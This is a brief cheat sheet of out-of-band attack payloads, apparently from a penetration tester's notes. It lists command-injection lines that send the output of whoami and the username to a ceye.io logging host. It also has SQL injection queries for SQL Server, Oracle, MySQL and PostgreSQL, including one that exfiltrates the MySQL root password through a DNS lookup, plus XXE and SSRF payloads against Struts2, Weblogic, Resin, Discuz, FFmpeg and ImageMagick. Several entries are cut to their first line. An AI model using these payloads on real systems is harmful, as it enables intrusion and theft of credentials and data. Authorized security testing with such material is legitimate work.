Out-of-Band Payload
0x00 Command Execution
i. nix:
1 | curl http://ip.port.b182oj.ceye.io/`whoami` |
ii. windows
1 | ping %USERNAME%.b182oj.ceye.io |
0x01 SQL Injection
i. SQL Server
1 | DECLARE @host varchar(1024); |
ii. Oracle
1 | SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io'); |
iii. MySQL
1 | SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc')); |
iv. PostgreSQL
1 | DROP TABLE IF EXISTS table_output; |
0x02 XML Entity Injection
1 | <?xml version="1.0" encoding="UTF-8"?> |
0x03 Others
i. Struts2
1 | xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4} |
ii. FFMpeg
1 | #EXTM3U |
iii. Weblogic
1 | xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search |
iv. ImageMagick
1 | push graphic-context |
v. Resin
1 | xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf |
vi. Discuz
1 | http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo |